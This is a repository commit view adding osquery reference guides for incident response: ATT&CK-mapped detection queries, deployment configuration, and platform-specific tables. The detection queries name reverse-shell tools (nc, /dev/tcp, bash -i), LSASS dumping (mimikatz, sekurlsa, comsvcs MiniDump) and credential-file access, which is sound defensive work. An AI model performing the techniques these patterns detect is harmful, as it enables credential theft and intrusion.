zhongwei/gh-agentsecops-secopsagentkit
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial commit

Browse Source
This commit is contained in:
Zhongwei Li
2025-11-29 17:51:02 +08:00
commit ff1f4bd119
252 changed files with 72682 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

539
skills/incident-response/forensics-osquery/references/mitre-attack-queries.md Normal file
View File

@@ -0,0 +1,539 @@
# MITRE ATT&CK Detection Queries for osquery
Pre-built osquery detection queries mapped to MITRE ATT&CK techniques for threat hunting and incident response.
## Table of Contents
- [Initial Access](#initial-access)
- [Execution](#execution)
- [Persistence](#persistence)
- [Privilege Escalation](#privilege-escalation)
- [Defense Evasion](#defense-evasion)
- [Credential Access](#credential-access)
- [Discovery](#discovery)
- [Lateral Movement](#lateral-movement)
- [Collection](#collection)
- [Exfiltration](#exfiltration)
## Initial Access
### T1078 - Valid Accounts
Detect unusual account usage patterns.
```sql
-- Unusual login times or locations
SELECT username, tty, host, time
FROM last
WHERE time > (strftime('%s', 'now') - 86400)
ORDER BY time DESC;
-- Failed authentication attempts (requires auth logs)
SELECT * FROM logged_in_users WHERE user NOT IN (SELECT username FROM users);
```
### T1190 - Exploit Public-Facing Application
Detect web server exploitation indicators.
```sql
-- Web server processes spawning shells
SELECT p1.name AS webserver, p1.cmdline,
p2.name AS child_process, p2.cmdline AS child_cmdline
FROM processes p1
JOIN processes p2 ON p1.pid = p2.parent
WHERE p1.name IN ('httpd', 'nginx', 'apache2', 'w3wp.exe', 'java')
AND p2.name IN ('bash', 'sh', 'cmd.exe', 'powershell.exe', 'python', 'perl');
```
## Execution
### T1059.001 - PowerShell
Detect suspicious PowerShell execution.
```sql
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE name LIKE '%powershell%'
AND (cmdline LIKE '%EncodedCommand%'
OR cmdline LIKE '%-enc%'
OR cmdline LIKE '%FromBase64String%'
OR cmdline LIKE '%Invoke-Expression%'
OR cmdline LIKE '%IEX%'
OR cmdline LIKE '%DownloadString%'
OR cmdline LIKE '%-w hidden%'
OR cmdline LIKE '%-WindowStyle hidden%');
```
### T1059.003 - Windows Command Shell
Detect suspicious cmd.exe usage.
```sql
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE name = 'cmd.exe'
AND (cmdline LIKE '%/c%'
OR cmdline LIKE '%&%'
OR cmdline LIKE '%|%'
OR cmdline LIKE '%<%'
OR cmdline LIKE '%>%');
```
### T1059.004 - Unix Shell
Detect suspicious shell execution.
```sql
SELECT pid, name, path, cmdline, parent, uid
FROM processes
WHERE name IN ('bash', 'sh', 'zsh', 'ksh')
AND (cmdline LIKE '%curl%http%'
OR cmdline LIKE '%wget%http%'
OR cmdline LIKE '%nc%'
OR cmdline LIKE '%netcat%'
OR cmdline LIKE '%/dev/tcp%'
OR cmdline LIKE '%base64%');
```
### T1053 - Scheduled Task/Job
Detect suspicious scheduled tasks.
```sql
-- Suspicious cron jobs (Linux/macOS)
SELECT command, path, minute, hour
FROM crontab
WHERE command LIKE '%curl%'
OR command LIKE '%wget%'
OR command LIKE '%/tmp/%'
OR command LIKE '%bash -i%'
OR command LIKE '%python -c%';
-- Suspicious scheduled tasks (Windows)
SELECT name, action, path, enabled
FROM scheduled_tasks
WHERE enabled = 1
AND (action LIKE '%powershell%'
OR action LIKE '%cmd%'
OR action LIKE '%wscript%'
OR action LIKE '%mshta%');
```
## Persistence
### T1547.001 - Registry Run Keys (Windows)
Detect persistence via registry.
```sql
SELECT key, name, path, data
FROM registry
WHERE (key LIKE '%\\Run' OR key LIKE '%\\RunOnce')
AND (data LIKE '%AppData%'
OR data LIKE '%Temp%'
OR data LIKE '%ProgramData%'
OR data LIKE '%.vbs'
OR data LIKE '%.js');
```
### T1547.006 - Kernel Modules and Extensions
Detect unauthorized kernel modules.
```sql
-- Linux kernel modules
SELECT name, size, used_by, status
FROM kernel_modules
WHERE name NOT IN (
'ip_tables', 'x_tables', 'nf_conntrack', 'nf_defrag_ipv4',
'iptable_filter', 'iptable_nat', 'ipt_MASQUERADE'
);
-- macOS kernel extensions
SELECT name, version, path
FROM kernel_extensions
WHERE loaded = 1
AND path NOT LIKE '/System/%'
AND path NOT LIKE '/Library/Extensions/%';
```
### T1053.003 - Cron (Linux/macOS)
Detect malicious cron jobs.
```sql
SELECT event, command, path, minute, hour, day_of_week
FROM crontab
WHERE command LIKE '%curl%http%'
OR command LIKE '%wget%http%'
OR command LIKE '%bash -i%'
OR command LIKE '%python%socket%'
OR command LIKE '%nc%'
OR command LIKE '%/dev/tcp%'
OR path LIKE '%/tmp/%'
OR path LIKE '%/var/tmp/%';
```
### T1543.002 - Systemd Service (Linux)
Detect malicious systemd services.
```sql
SELECT name, fragment_path, description, active_state
FROM systemd_units
WHERE active_state = 'active'
AND fragment_path NOT LIKE '/usr/lib/systemd/system/%'
AND fragment_path NOT LIKE '/lib/systemd/system/%';
```
## Privilege Escalation
### T1548.003 - Sudo and Sudo Caching
Detect sudo abuse.
```sql
SELECT pid, name, cmdline, uid, euid, parent
FROM processes
WHERE name = 'sudo'
AND (cmdline LIKE '%-i%'
OR cmdline LIKE '%-s%'
OR cmdline LIKE '%-u root%');
```
### T1548.001 - Setuid and Setgid
Find suspicious SUID/SGID binaries.
```sql
SELECT path, filename, mode, uid, gid
FROM file
WHERE (mode LIKE '%4%' OR mode LIKE '%2%')
AND (path LIKE '/tmp/%'
OR path LIKE '/var/tmp/%'
OR path LIKE '/home/%'
OR path LIKE '/dev/shm/%');
```
### T1543.001 - Launch Agent (macOS)
Detect malicious launch agents.
```sql
SELECT name, path, program, program_arguments, run_at_load
FROM launchd
WHERE run_at_load = 1
AND (path LIKE '%/tmp/%'
OR path LIKE '%/Users/%/Library/LaunchAgents/%'
OR program LIKE '%curl%'
OR program LIKE '%bash%');
```
## Defense Evasion
### T1055 - Process Injection
Detect process injection techniques.
```sql
-- Windows process injection indicators
SELECT pid, name, path, cmdline
FROM processes
WHERE cmdline LIKE '%VirtualAllocEx%'
OR cmdline LIKE '%WriteProcessMemory%'
OR cmdline LIKE '%CreateRemoteThread%'
OR cmdline LIKE '%QueueUserAPC%'
OR cmdline LIKE '%SetThreadContext%';
-- Processes with deleted executables (Linux indicator)
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE on_disk = 0;
```
### T1070.004 - File Deletion
Detect log and evidence deletion.
```sql
SELECT pid, name, cmdline, path
FROM processes
WHERE (cmdline LIKE '%rm%'
OR cmdline LIKE '%del%'
OR cmdline LIKE '%shred%'
OR cmdline LIKE '%wipe%')
AND (cmdline LIKE '%log%'
OR cmdline LIKE '%audit%'
OR cmdline LIKE '%history%'
OR cmdline LIKE '%bash_history%');
```
### T1027 - Obfuscated Files or Information
Detect encoding and obfuscation.
```sql
SELECT pid, name, path, cmdline
FROM processes
WHERE cmdline LIKE '%base64%'
OR cmdline LIKE '%certutil%decode%'
OR cmdline LIKE '%[Convert]::FromBase64String%'
OR cmdline LIKE '%openssl enc%'
OR cmdline LIKE '%uuencode%';
```
### T1564.001 - Hidden Files and Directories
Find hidden files in unusual locations.
```sql
SELECT path, filename, size, mtime
FROM file
WHERE filename LIKE '.%'
AND (path LIKE '/tmp/%'
OR path LIKE '/var/tmp/%'
OR path LIKE '/dev/shm/%')
AND size > 0;
```
## Credential Access
### T1003.001 - LSASS Memory (Windows)
Detect LSASS dumping.
```sql
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE name IN ('mimikatz.exe', 'procdump.exe', 'pwdump.exe')
OR cmdline LIKE '%sekurlsa%'
OR cmdline LIKE '%lsadump%'
OR cmdline LIKE '%procdump%lsass%'
OR cmdline LIKE '%comsvcs.dll%MiniDump%';
```
### T1003.008 - /etc/passwd and /etc/shadow
Detect access to credential files.
```sql
-- Processes accessing password files
SELECT p.name, p.cmdline, pm.path
FROM processes p
JOIN process_memory_map pm ON p.pid = pm.pid
WHERE pm.path IN ('/etc/shadow', '/etc/passwd', '/etc/master.passwd')
AND p.name NOT IN ('sshd', 'login', 'su', 'sudo');
```
### T1552.001 - Credentials in Files
Search for credential files.
```sql
SELECT path, filename, size
FROM file
WHERE (filename LIKE '%password%'
OR filename LIKE '%credential%'
OR filename LIKE '%secret%'
OR filename LIKE '%.pem'
OR filename LIKE '%.key'
OR filename = '.bash_history'
OR filename = '.zsh_history')
AND path LIKE '/home/%';
```
## Discovery
### T1057 - Process Discovery
Detect process enumeration.
```sql
SELECT pid, name, cmdline, parent
FROM processes
WHERE cmdline LIKE '%ps aux%'
OR cmdline LIKE '%tasklist%'
OR cmdline LIKE '%Get-Process%'
OR name IN ('ps', 'tasklist.exe');
```
### T1082 - System Information Discovery
Detect system reconnaissance.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%systeminfo%'
OR cmdline LIKE '%uname -a%'
OR cmdline LIKE '%Get-ComputerInfo%'
OR cmdline LIKE '%hostnamectl%'
OR cmdline LIKE '%sw_vers%';
```
### T1083 - File and Directory Discovery
Detect file enumeration.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%find%'
OR cmdline LIKE '%dir /s%'
OR cmdline LIKE '%ls -la%'
OR cmdline LIKE '%Get-ChildItem%';
```
### T1087 - Account Discovery
Detect account enumeration.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%net user%'
OR cmdline LIKE '%net group%'
OR cmdline LIKE '%net localgroup%'
OR cmdline LIKE '%Get-LocalUser%'
OR cmdline LIKE '%whoami%'
OR cmdline LIKE '%id%';
```
### T1046 - Network Service Scanning
Detect network scanning activity.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%nmap%'
OR cmdline LIKE '%masscan%'
OR cmdline LIKE '%netcat%'
OR cmdline LIKE '%nc%'
OR name IN ('nmap', 'masscan', 'nc', 'netcat');
```
## Lateral Movement
### T1021.001 - Remote Desktop Protocol
Detect RDP connections.
```sql
SELECT p.pid, p.name, p.cmdline, ps.remote_address, ps.remote_port
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_port = 3389
OR p.name LIKE '%mstsc%'
OR p.name LIKE '%rdp%';
```
### T1021.002 - SMB/Windows Admin Shares
Detect SMB lateral movement.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%\\\\%\\admin$%'
OR cmdline LIKE '%\\\\%\\c$%'
OR cmdline LIKE '%net use%'
OR cmdline LIKE '%PsExec%';
```
### T1021.004 - SSH
Detect SSH lateral movement.
```sql
-- Outbound SSH connections
SELECT p.pid, p.name, p.cmdline, ps.remote_address, ps.remote_port
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_port = 22
AND p.name = 'ssh';
-- Unusual SSH sessions
SELECT user, tty, host, time
FROM logged_in_users
WHERE tty LIKE 'pts/%'
AND user NOT IN ('root', 'admin');
```
## Collection
### T1560.001 - Archive via Utility
Detect data archiving for staging.
```sql
SELECT pid, name, cmdline, path
FROM processes
WHERE cmdline LIKE '%tar%'
OR cmdline LIKE '%zip%'
OR cmdline LIKE '%7z%'
OR cmdline LIKE '%rar%'
OR cmdline LIKE '%Compress-Archive%';
```
### T1119 - Automated Collection
Detect automated data collection scripts.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE (cmdline LIKE '%find%'
OR cmdline LIKE '%grep%'
OR cmdline LIKE '%Select-String%')
AND (cmdline LIKE '%password%'
OR cmdline LIKE '%credential%'
OR cmdline LIKE '%secret%'
OR cmdline LIKE '%.doc%'
OR cmdline LIKE '%.xls%');
```
## Exfiltration
### T1041 - Exfiltration Over C2 Channel
Detect suspicious network connections.
```sql
-- Unusual outbound connections
SELECT p.name, p.cmdline, ps.remote_address, ps.remote_port, ps.protocol
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_address NOT IN ('127.0.0.1', '::1')
AND ps.remote_port NOT IN (80, 443, 22, 53, 3389)
AND ps.state = 'ESTABLISHED';
```
### T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Detect data exfiltration via common tools.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%curl%'
OR cmdline LIKE '%wget%'
OR cmdline LIKE '%scp%'
OR cmdline LIKE '%ftp%'
OR cmdline LIKE '%rsync%';
```
## Query Usage Notes
1. **Test queries** in a lab environment before production use
2. **Tune for environment** - add whitelist filters for legitimate activity
3. **Combine queries** - join multiple detections for higher confidence
4. **Time window** - add time filters to reduce result sets
5. **Baseline first** - understand normal activity before hunting
## Reference
- [MITRE ATT&CK Framework](https://attack.mitre.org/)
- [MITRE ATT&CK Techniques](https://attack.mitre.org/techniques/enterprise/)

518
skills/incident-response/forensics-osquery/references/osqueryd-deployment.md Normal file
View File

@@ -0,0 +1,518 @@
# osqueryd Deployment Guide
Deploy osqueryd for continuous endpoint monitoring, detection, and forensic evidence collection at scale.
## Table of Contents
- [Overview](#overview)
- [Installation](#installation)
- [Configuration](#configuration)
- [Query Packs](#query-packs)
- [Log Management](#log-management)
- [Fleet Management](#fleet-management)
- [Performance Tuning](#performance-tuning)
## Overview
osqueryd is the daemon component of osquery that enables:
- Scheduled query execution across endpoint fleet
- Real-time event monitoring with event tables
- Centralized log collection and aggregation
- Detection-as-code with versioned query packs
## Installation
### Linux (Ubuntu/Debian)
```bash
# Add osquery repository
export OSQUERY_KEY=1484120AC4E9F8A1A577AEEE97A80C63C9D8B80B
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys $OSQUERY_KEY
# Add repository
sudo add-apt-repository 'deb [arch=amd64] https://pkg.osquery.io/deb deb main'
# Install
sudo apt update
sudo apt install osquery
```
### Linux (RHEL/CentOS)
```bash
# Add osquery repository
curl -L https://pkg.osquery.io/rpm/GPG | sudo tee /etc/pki/rpm-gpg/RPM-GPG-KEY-osquery
# Add repository
sudo yum-config-manager --add-repo https://pkg.osquery.io/rpm/osquery-s3-rpm.repo
# Install
sudo yum install osquery
```
### macOS
```bash
# Using Homebrew
brew install osquery
# Or download official PKG installer
# https://pkg.osquery.io/darwin/osquery-<version>.pkg
```
### Windows
```powershell
# Download MSI installer
# https://pkg.osquery.io/windows/osquery-<version>.msi
# Install via PowerShell
msiexec /i osquery-<version>.msi /quiet
```
## Configuration
### Configuration File Location
- Linux: `/etc/osquery/osquery.conf`
- macOS: `/var/osquery/osquery.conf`
- Windows: `C:\Program Files\osquery\osquery.conf`
### Basic Configuration
```json
{
"options": {
"config_plugin": "filesystem",
"logger_plugin": "filesystem",
"logger_path": "/var/log/osquery",
"disable_logging": false,
"log_result_events": true,
"schedule_splay_percent": 10,
"pidfile": "/var/osquery/osquery.pidfile",
"events_expiry": 3600,
"database_path": "/var/osquery/osquery.db",
"verbose": false,
"worker_threads": 2,
"enable_monitor": true,
"disable_events": false,
"disable_audit": false,
"audit_allow_config": true,
"audit_allow_sockets": true,
"host_identifier": "hostname",
"enable_syslog": false,
"syslog_pipe_path": "/var/osquery/syslog_pipe"
},
"schedule": {
"system_info": {
"query": "SELECT * FROM system_info;",
"interval": 3600,
"description": "Collect system information hourly"
},
"running_processes": {
"query": "SELECT pid, name, path, cmdline, uid FROM processes;",
"interval": 300,
"description": "Monitor running processes every 5 minutes"
},
"network_connections": {
"query": "SELECT p.name, p.cmdline, ps.remote_address, ps.remote_port FROM processes p JOIN process_open_sockets ps ON p.pid = ps.pid WHERE ps.remote_address NOT IN ('127.0.0.1', '::1');",
"interval": 600,
"description": "Monitor network connections every 10 minutes"
}
},
"packs": {
"incident-response": "/etc/osquery/packs/ir-triage.conf",
"ossec-rootkit": "/usr/share/osquery/packs/ossec-rootkit.conf"
}
}
```
### Security-Focused Configuration
```json
{
"options": {
"config_plugin": "filesystem",
"logger_plugin": "filesystem",
"logger_path": "/var/log/osquery",
"disable_logging": false,
"log_result_events": true,
"schedule_splay_percent": 10,
"worker_threads": 4,
"enable_monitor": true,
"watchdog_level": 1,
"watchdog_memory_limit": 250,
"watchdog_utilization_limit": 20
},
"schedule": {
"suspicious_processes": {
"query": "SELECT * FROM processes WHERE on_disk = 0 OR path LIKE '%tmp%' OR path LIKE '%Temp%';",
"interval": 300,
"description": "Detect suspicious processes"
},
"unauthorized_suid": {
"query": "SELECT path, mode, uid FROM file WHERE (mode LIKE '%4%' OR mode LIKE '%2%') AND path NOT IN (SELECT path FROM file WHERE path LIKE '/usr/%' OR path LIKE '/bin/%');",
"interval": 3600,
"description": "Find unauthorized SUID binaries",
"platform": "posix"
},
"registry_run_keys": {
"query": "SELECT key, name, path FROM registry WHERE key LIKE '%Run%' OR key LIKE '%RunOnce%';",
"interval": 3600,
"description": "Monitor registry persistence",
"platform": "windows"
}
}
}
```
## Query Packs
### Creating Query Packs
Query packs organize related queries for specific security scenarios.
**Example: `/etc/osquery/packs/ir-triage.conf`**
```json
{
"platform": "all",
"version": "1.0.0",
"queries": {
"logged_in_users": {
"query": "SELECT * FROM logged_in_users;",
"interval": 600,
"description": "Track logged-in users"
},
"listening_ports": {
"query": "SELECT lp.port, lp.address, p.name, p.path FROM listening_ports lp LEFT JOIN processes p ON lp.pid = p.pid WHERE lp.address NOT IN ('127.0.0.1', '::1');",
"interval": 300,
"description": "Monitor listening network ports"
},
"kernel_modules": {
"query": "SELECT name, used_by, status FROM kernel_modules;",
"interval": 3600,
"description": "Monitor loaded kernel modules",
"platform": "linux"
},
"scheduled_tasks": {
"query": "SELECT name, action, path, enabled FROM scheduled_tasks WHERE enabled = 1;",
"interval": 3600,
"description": "Monitor Windows scheduled tasks",
"platform": "windows"
},
"launchd_services": {
"query": "SELECT name, path, program, run_at_load FROM launchd WHERE run_at_load = 1;",
"interval": 3600,
"description": "Monitor macOS launch services",
"platform": "darwin"
}
}
}
```
### Platform-Specific Packs
Use `"platform"` field to limit queries:
- `"posix"` - Linux and macOS
- `"linux"` - Linux only
- `"darwin"` - macOS only
- `"windows"` - Windows only
- `"all"` - All platforms
## Log Management
### Log Types
osqueryd generates several log types:
1. **Result logs**: Query results from scheduled queries
2. **Status logs**: osqueryd operational status and errors
3. **Snapshot logs**: Full result sets (vs differential)
### Log Formats
**JSON (recommended):**
```json
{
"name": "suspicious_processes",
"hostIdentifier": "web-server-01",
"calendarTime": "Mon Oct 02 12:34:56 2023 UTC",
"unixTime": 1696251296,
"epoch": 0,
"counter": 1,
"columns": {
"pid": "1234",
"name": "suspicious",
"path": "/tmp/suspicious"
},
"action": "added"
}
```
### Centralized Logging
#### Option 1: Syslog
```json
{
"options": {
"logger_plugin": "syslog",
"syslog_pipe_path": "/var/osquery/syslog_pipe"
}
}
```
#### Option 2: AWS Kinesis/Firehose
```json
{
"options": {
"logger_plugin": "aws_kinesis",
"aws_kinesis_stream": "osquery-results",
"aws_region": "us-east-1"
}
}
```
#### Option 3: TLS Endpoint
```json
{
"options": {
"logger_plugin": "tls",
"logger_tls_endpoint": "/log",
"logger_tls_period": 60
}
}
```
#### Option 4: Kafka
```json
{
"options": {
"logger_plugin": "kafka_producer",
"kafka_topic": "osquery-logs",
"kafka_brokers": "broker1:9092,broker2:9092"
}
}
```
## Fleet Management
### Fleet Manager Options
1. **osquery Fleet Manager** - Official fleet management tool
2. **Kolide Fleet** - Open-source fleet management (now FleetDM)
3. **Doorman** - Minimal fleet manager
4. **Zentral** - macOS-focused fleet management
### FleetDM Configuration
```yaml
# fleet-config.yml
mysql:
address: 127.0.0.1:3306
database: fleet
username: fleet
password: fleet_password
redis:
address: 127.0.0.1:6379
server:
address: 0.0.0.0:8080
tls: true
cert: /path/to/cert.pem
key: /path/to/key.pem
logging:
json: true
debug: false
```
### Enrolling Endpoints
#### TLS Enrollment
```json
{
"options": {
"enroll_secret_path": "/etc/osquery/enroll_secret.txt",
"tls_server_certs": "/etc/osquery/certs/server.pem",
"tls_hostname": "fleet.example.com",
"host_identifier": "uuid",
"enroll_tls_endpoint": "/api/v1/osquery/enroll",
"config_plugin": "tls",
"config_tls_endpoint": "/api/v1/osquery/config",
"config_refresh": 60,
"logger_plugin": "tls",
"logger_tls_endpoint": "/api/v1/osquery/log",
"logger_tls_period": 10,
"distributed_plugin": "tls",
"distributed_interval": 60,
"distributed_tls_read_endpoint": "/api/v1/osquery/distributed/read",
"distributed_tls_write_endpoint": "/api/v1/osquery/distributed/write"
}
}
```
## Performance Tuning
### Resource Limits
```json
{
"options": {
"watchdog_level": 1,
"watchdog_memory_limit": 250,
"watchdog_utilization_limit": 20,
"worker_threads": 4,
"schedule_timeout": 60,
"schedule_max_drift": 60
}
}
```
### Query Optimization
1. **Use appropriate intervals**: Balance freshness vs performance
- Critical queries: 60-300 seconds
- Standard monitoring: 300-900 seconds
- Inventory queries: 3600+ seconds
2. **Add WHERE clauses**: Reduce result set size
```sql
-- Bad: SELECT * FROM file;
-- Good: SELECT * FROM file WHERE path LIKE '/etc/%';
```
3. **Limit result sets**: Use LIMIT clause
```sql
SELECT * FROM processes ORDER BY start_time DESC LIMIT 100;
```
4. **Differential logging**: Only log changes
```json
{
"options": {
"log_result_events": true
}
}
```
### Schedule Splay
Prevent query storms by adding jitter:
```json
{
"options": {
"schedule_splay_percent": 10
}
}
```
## Service Management
### Linux (systemd)
```bash
# Start osqueryd
sudo systemctl start osqueryd
# Enable on boot
sudo systemctl enable osqueryd
# Check status
sudo systemctl status osqueryd
# View logs
sudo journalctl -u osqueryd -f
```
### macOS (launchd)
```bash
# Start osqueryd
sudo launchctl load /Library/LaunchDaemons/com.facebook.osqueryd.plist
# Stop osqueryd
sudo launchctl unload /Library/LaunchDaemons/com.facebook.osqueryd.plist
# Check status
sudo launchctl list | grep osquery
```
### Windows (Service)
```powershell
# Start service
Start-Service osqueryd
# Stop service
Stop-Service osqueryd
# Check status
Get-Service osqueryd
# View logs
Get-Content "C:\ProgramData\osquery\log\osqueryd.results.log" -Wait
```
## Security Best Practices
1. **Limit configuration access**: Restrict `/etc/osquery/` to root only
2. **Use TLS**: Encrypt fleet management communications
3. **Rotate secrets**: Change enrollment secrets regularly
4. **Monitor osqueryd**: Alert on service failures
5. **Version control configs**: Track configuration changes in Git
6. **Test before deploy**: Validate queries in lab first
7. **Implement RBAC**: Use fleet manager role-based access
8. **Audit queries**: Review all scheduled queries for performance impact
## Troubleshooting
### High CPU Usage
Check query performance:
```bash
# Enable verbose logging
sudo osqueryd --verbose --config_path=/etc/osquery/osquery.conf
# Check query times
tail -f /var/log/osquery/osqueryd.INFO | grep "query="
```
### Missing Results
Verify query syntax:
```bash
# Test query interactively
osqueryi "SELECT * FROM processes LIMIT 5;"
# Check for errors
tail -f /var/log/osquery/osqueryd.results.log
```
### Service Crashes
Review watchdog settings:
```json
{
"options": {
"watchdog_level": 0, # Disable for debugging
"verbose": true
}
}
```
## Reference
- [osquery Deployment Guide](https://osquery.readthedocs.io/en/stable/deployment/)
- [FleetDM Documentation](https://fleetdm.com/docs)
- [osquery Configuration](https://osquery.readthedocs.io/en/stable/deployment/configuration/)

353
skills/incident-response/forensics-osquery/references/platform-differences.md Normal file
View File

@@ -0,0 +1,353 @@
# Platform-Specific osquery Tables and Queries
Guide to platform-specific tables and query variations across Linux, macOS, and Windows.
## Table of Contents
- [Cross-Platform Tables](#cross-platform-tables)
- [Linux-Specific Tables](#linux-specific-tables)
- [macOS-Specific Tables](#macos-specific-tables)
- [Windows-Specific Tables](#windows-specific-tables)
- [Query Translation Examples](#query-translation-examples)
## Cross-Platform Tables
These tables work across all platforms with consistent schemas:
- `processes` - Running processes
- `users` - User accounts
- `groups` - User groups
- `file` - File system metadata
- `hash` - File hashing
- `system_info` - System information
- `os_version` - OS version details
- `interface_addresses` - Network interfaces
- `routes` - Routing table
- `listening_ports` - Listening network ports
## Linux-Specific Tables
### Process and System
| Table | Description |
|-------|-------------|
| `kernel_modules` | Loaded kernel modules |
| `kernel_info` | Kernel version and boot parameters |
| `memory_info` | System memory information |
| `process_namespaces` | Linux namespace information |
| `seccomp_events` | Seccomp filter events |
| `selinux_events` | SELinux audit events |
| `apparmor_events` | AppArmor audit events |
### Package Management
| Table | Description |
|-------|-------------|
| `deb_packages` | Debian/Ubuntu packages (dpkg) |
| `rpm_packages` | RPM packages (yum/dnf) |
| `portage_packages` | Gentoo Portage packages |
| `pacman_packages` | Arch Linux packages |
### Persistence
| Table | Description |
|-------|-------------|
| `crontab` | Cron scheduled jobs |
| `systemd_units` | Systemd services and units |
### Example Linux Queries
```sql
-- Check kernel modules
SELECT name, size, used_by, status FROM kernel_modules;
-- Active systemd services
SELECT id, description, active_state, fragment_path
FROM systemd_units
WHERE active_state = 'active';
-- Recently installed packages (Debian/Ubuntu)
SELECT name, version, install_time
FROM deb_packages
ORDER BY install_time DESC LIMIT 20;
-- SELinux denials
SELECT * FROM selinux_events WHERE denied = 1;
```
## macOS-Specific Tables
### System and Kernel
| Table | Description |
|-------|-------------|
| `kernel_extensions` | Loaded kernel extensions (kexts) |
| `system_extensions` | macOS system extensions |
| `signature` | Code signature verification |
| `quarantine` | Quarantine database entries |
### Persistence
| Table | Description |
|-------|-------------|
| `launchd` | Launch agents and daemons |
| `startup_items` | Startup items |
| `periodic_items` | Periodic script executions |
### Applications
| Table | Description |
|-------|-------------|
| `apps` | Installed macOS applications |
| `safari_extensions` | Safari browser extensions |
| `authorization_mechanisms` | Authorization plugin mechanisms |
### Security
| Table | Description |
|-------|-------------|
| `extended_attributes` | File extended attributes (xattr) |
| `keychain_items` | macOS Keychain items |
| `firewall` | macOS firewall settings |
### Example macOS Queries
```sql
-- Launch agents that run at load
SELECT name, path, program, program_arguments, run_at_load
FROM launchd
WHERE run_at_load = 1
AND path NOT LIKE '/System/%';
-- Loaded kernel extensions
SELECT name, version, path, linked_against
FROM kernel_extensions
WHERE loaded = 1;
-- Quarantined files
SELECT path, description, data_url
FROM quarantine
WHERE path LIKE '/Users/%/Downloads/%';
-- Unsigned executables in Applications
SELECT path, signed FROM signature
WHERE path LIKE '/Applications/%' AND signed = 0;
-- Code signing status
SELECT path, authority, signed, identifier
FROM signature
WHERE path = '/Applications/Suspicious.app/Contents/MacOS/Suspicious';
```
## Windows-Specific Tables
### System and Registry
| Table | Description |
|-------|-------------|
| `registry` | Windows registry access |
| `drivers` | Device drivers |
| `services` | Windows services |
| `wmi_cli_event_consumers` | WMI event consumers |
| `wmi_filter_consumer_binding` | WMI filter bindings |
### Persistence
| Table | Description |
|-------|-------------|
| `scheduled_tasks` | Windows scheduled tasks |
| `autoexec` | Auto-execution entries |
| `startup_items` | Startup folder items |
### Security
| Table | Description |
|-------|-------------|
| `windows_eventlog` | Windows Event Log |
| `authenticode` | Authenticode signature verification |
| `windows_security_products` | Installed security products |
| `bitlocker_info` | BitLocker encryption status |
### Processes
| Table | Description |
|-------|-------------|
| `process_memory_map` | Process memory mappings |
| `process_handles` | Open process handles |
### Example Windows Queries
```sql
-- Registry Run keys
SELECT key, name, path, data, mtime
FROM registry
WHERE (key LIKE '%\\Run' OR key LIKE '%\\RunOnce')
AND key NOT LIKE '%\\RunOnceEx';
-- Scheduled tasks
SELECT name, action, path, enabled, last_run_time, next_run_time
FROM scheduled_tasks
WHERE enabled = 1
ORDER BY next_run_time;
-- WMI persistence
SELECT name, command_line_template, executable_path
FROM wmi_cli_event_consumers;
-- Windows services
SELECT name, display_name, status, path, start_type, user_account
FROM services
WHERE start_type IN ('AUTO_START', 'DEMAND_START')
ORDER BY status;
-- Event log security events
SELECT datetime, eventid, source, data
FROM windows_eventlog
WHERE channel = 'Security'
AND eventid IN (4624, 4625, 4648, 4672)
ORDER BY datetime DESC LIMIT 100;
-- Authenticode signature verification
SELECT path, result, subject_name, issuer_name
FROM authenticode
WHERE path LIKE 'C:\Users\%'
AND result != 'trusted';
```
## Query Translation Examples
### Persistence Mechanisms
**Linux:**
```sql
-- Cron jobs
SELECT * FROM crontab;
-- Systemd services
SELECT name, fragment_path, active_state
FROM systemd_units
WHERE active_state = 'active';
```
**macOS:**
```sql
-- Launch agents/daemons
SELECT name, path, program, run_at_load
FROM launchd
WHERE run_at_load = 1;
-- Startup items
SELECT name, path, type, source
FROM startup_items;
```
**Windows:**
```sql
-- Registry Run keys
SELECT key, name, path
FROM registry
WHERE key LIKE '%Run%';
-- Scheduled tasks
SELECT name, action, enabled
FROM scheduled_tasks
WHERE enabled = 1;
```
### Package/Application Inventory
**Linux (Debian/Ubuntu):**
```sql
SELECT name, version, install_time
FROM deb_packages
ORDER BY install_time DESC;
```
**Linux (RHEL/CentOS):**
```sql
SELECT name, version, install_time
FROM rpm_packages
ORDER BY install_time DESC;
```
**macOS:**
```sql
SELECT name, path, bundle_version, last_opened_time
FROM apps
ORDER BY last_opened_time DESC;
```
**Windows:**
```sql
SELECT name, version, install_location, install_date
FROM programs
ORDER BY install_date DESC;
```
### Network Connections
**All Platforms:**
```sql
-- Active connections
SELECT p.name, p.cmdline, ps.remote_address, ps.remote_port, ps.state
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.state = 'ESTABLISHED';
```
**Platform-specific filtering:**
```sql
-- Linux: Filter by network namespace
SELECT * FROM process_open_sockets
WHERE pid IN (SELECT pid FROM processes WHERE root != '/');
-- macOS: Include code signature
SELECT p.name, ps.remote_address, s.authority
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
LEFT JOIN signature s ON p.path = s.path;
-- Windows: Include service name
SELECT p.name, s.name AS service_name, ps.remote_address
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
LEFT JOIN services s ON p.path = s.path;
```
## Platform Detection in Queries
Use `os_version` table to detect platform:
```sql
-- Get current platform
SELECT platform, name, version FROM os_version;
-- Platform-specific queries
SELECT CASE
